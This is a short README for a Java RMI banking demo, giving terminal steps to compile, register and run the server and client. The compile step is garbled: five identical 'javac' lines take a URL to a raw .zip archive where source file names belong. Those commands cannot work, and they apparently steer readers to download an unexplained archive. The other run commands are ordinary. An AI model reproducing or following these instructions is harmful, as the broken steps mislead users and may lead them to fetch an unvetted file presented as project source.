RMISimpleBankSystem
To run Java RMI server/client on ubuntu, run the following commands on terminal:
cd '/directory'
//compile .java files
javac https://github.com/chester1900/RMISimpleBankSystem/raw/refs/heads/master/src/Bank-System-RMI-Simple-2.8.zip
javac https://github.com/chester1900/RMISimpleBankSystem/raw/refs/heads/master/src/Bank-System-RMI-Simple-2.8.zip
javac https://github.com/chester1900/RMISimpleBankSystem/raw/refs/heads/master/src/Bank-System-RMI-Simple-2.8.zip
javac https://github.com/chester1900/RMISimpleBankSystem/raw/refs/heads/master/src/Bank-System-RMI-Simple-2.8.zip
javac https://github.com/chester1900/RMISimpleBankSystem/raw/refs/heads/master/src/Bank-System-RMI-Simple-2.8.zip
rmic BankAccount
rmiregistry 2008
//run the server with mysql dependency
java -cp "/mysqldirectory/mysql-connector-java-5.1.23:."BankServer
//run the client
java BankClient
===================